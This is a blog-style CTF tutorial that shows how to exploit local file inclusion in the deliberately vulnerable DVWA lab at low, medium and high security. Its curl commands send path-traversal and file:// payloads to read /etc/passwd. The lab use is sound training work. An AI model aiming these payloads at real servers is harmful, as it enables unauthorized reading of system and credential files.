Skip to content

Learning CTF with DVWA – LFI

So you installed Dam Vulnerable Web Applications, now what to you do. Join me as I continue my series on Learning about Linux CTF Challenges with DVWA. DVWA (Dam Vulnerable Web Application) is a framework we can use to learn about Linux exploits that we can use in common CTF challenges. In this post I will go through Learning how DVWA LFI (local file inclusion) works using Hydra and curl.

What is LFI

LFI or Local File Inclusion, is a hack or trick where we can browse files on the remote web-server. This are a few causes for this, sometimes the web developer wants to share the contents of a file to the viewer and presents these contents via PHP into the web page that is being viewed. However if the developer is not careful and include some fail-safes, then a simple modification to the url can result in the remote viewer being able to browse the file system of the web server.

Set-up

System

In my previous post I discussed how to set up DVWA inside docker on my black arch system. You should have a running DVWA environment before attempting any of the below.

192.168.1.163 Docker host running DVWA
8082Port on which DVWA is running
192.168.1.150Windows PC where I am running WSL and Firefox

Authentication

Most of the commands we will use here will require authentication before you can attempt any commands. We can use a PHP Session ID to enable authentication.

Getting PHP Session ID

To get a session ID we will use Firefox but Chrome and Edge have the same features. First step is to open up the home page of DVWA and login in. The default login is user: admin and password: password

Once logged in you need to set the DVWA Security to low. This can be done after login by clicking on the DVWA Security tab, setting the Security Level to low and click “Submit”

Inside firefox lets open the inspect tool. You can do this by right clicking the page and select “Inspect” or use the keyboard short cut, in windows thats “ctrl + shift + c”. Once opened go to the storage tab and under “Cookies” Select the PHPSSID Cookie. The Cookie value will appear on the right side of the screen, right click and copy it.

In my case the value is “PHPSESSID:”hjqhvo1e4i14bo6hbh9ndqc7h2“. Whatever your value is keep it some where safe as you will need it in when doing some enumeration later on.

Also we can see another cookie here called “security” with the value of “low”. We need this for authentication and for setting the security level of the DVWA system.

Testing Authentication

Now you have the php session id its simple to check if it works.

First with out any authentication Cookies.

curl http://192.168.1.163:8082/vulnerabilities/brute/

No result and nothing returned. Lets now try it using our php session cookie and security level.

curl http://192.168.1.163:8082/vulnerabilities/brute/ \
-H "Cookie: security=low;PHPSESSID=hjqhvo1e4i14bo6hbh9ndqc7h2" \
-s | head

We pipe the command into head as there is a lot of code returned and we only want to see the top few lines.

Success

We have now confirmed that our Authentication works and can proceed with testing the exploits.

DVWA LFI

Security Levels

Like the rest of the DVWA challenges, the LFI one comes with 4 security levels.

  • Low, very straight forward LFI attack.
  • Medium, very similar to the previous one slightly different approach.
  • High, Similar to the preceding two, not too challenging.
  • Impossible, what is says.

Beating LFI Low Security

Log into DVWA, set the security level to low and click the “File Inclusion” button.

You can see there are 3 different files that you can click, they are all php files and include different output. Click each of them.

One thing to notice is in the url bar we can see the url pointing directly to the file .

http://192.168.1.163:8082/vulnerabilities/fi/?page=file2.php

The file is called “file2.php” and as there is no path listed in front of it, like /tmp/file2.php, then we can assume that the file is in the directory /vulnerabilities/fi/. Using Linux Path Transversal, we can try to open another file. Lets see if we can find the /etc/passwd file.

When using Path Transversal (../) I tend to use 4 or 5 transversal levels. So lets try it with the below url.

http://192.168.1.163:8082/vulnerabilities/fi/?page=../../../../../etc/passwd

Bingo, you can see the contents of /etc/passwd at the top of the page. But this is very messy. As we are linux guys lets do it via the command line and get a cleaner output using some Regex.

curl "http://192.168.1.163:8082/vulnerabilities/fi/?page=/../../../../etc/passwd" \
-H "Cookie: security=low;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" \
-s \
| egrep "^(\w+:)"

Lets break down this command.

curl,Curl is a command line utility to make requests to web pages.
-H,This is the Authentication information that we gathered earlier.
-sHides curls status bar.
| egrep “^(\w+:)”Regex that checks for lines that begin with letters and have a “:” after them. as /etc/passwd is delimited by “:” it makes it easy to pull it out.

And we have the contents of the /etc/passwd file.

Beating LFI Medium Security

Changing the security level to Medium does not make it too difficult to beat. Its just a different approach. When security is set to medium then there is a filter on teh service side looking for “../” and prevents it from running. Easy way to beat this is put the fully qualified path to the file you want to open. In the case of the “passwd” file it’s “/etc/passwd” so our command would change to the below.

curl "http://192.168.1.163:8082/vulnerabilities/fi/?page=/etc/passwd" \
-H "Cookie: security=medium;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" \
-s \
| egrep "^(\w+:)"

Beating LFI High Security

Changing the security level to high also does not make it too difficult to beat. Its just another different approach. When security is set to high then there is a filter on the service side preventing all file browsing using our previous methods. Easy way to beat this is put the file:// attribute in front of the file you want to open. In the case of the “passwd” file it’s “file:///etc/passwd” so our command would change to the below.

curl "http://192.168.1.163:8082/vulnerabilities/fi/?page=file:///etc/passwd" \
-H "Cookie: security=medium;PHPSESSID=sini0kbuab7gorpopvaqnb8ke4" \
-s \
| egrep "^(\w+:)"

Wrap up

I hoped you found this useful and learned something about DVWA LFI. Check out my video on how to do it just using the urls.

Published inCTFDockerDVWA

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *